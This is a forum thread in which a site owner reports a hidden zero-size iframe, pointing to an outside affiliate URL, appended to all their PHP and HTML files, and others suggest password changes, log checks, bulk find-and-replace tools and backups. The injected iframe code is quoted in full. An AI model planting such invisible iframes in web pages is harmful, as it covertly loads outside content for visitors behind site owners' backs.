Well, everyone of my .php and html files have this on the bottom, for all my forums...
Lainaa<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
removing them..... not as much fun as it may first sound..
Is there a program that could delete that from every file on the server?
Do not know how these gems got access.
First of all, change all your passwords, including FTP, database, server passwords.
You can mass "find and replace" by using Dreamweaver. I don't know any other program that can mass change, but I've heard that Linux has this as a standard.
Use the error logs of your hosting control panel to see how they got access.
if you download your site to your local drive, you can do a file contents-find&replace with UltraEdit.
There are several gigs on the server.... thinking now it may be best two go to a 3 day old back up...
We are sure they did not use my password, but may have got in on my ubbthreads forum...
Any idea how it happened? This is a major worry!! Are you sure it wasn't put on there using the Ad Mod or something similar? Can't imagine they managed to break into your FTP?
Another nifty program is the freeware PSPad. It's ultra fast at replacing text in whole directory structures.
Maybe related to:
http://www.simplemachines.org/community/index.php?topic=83110.msg554625#msg554625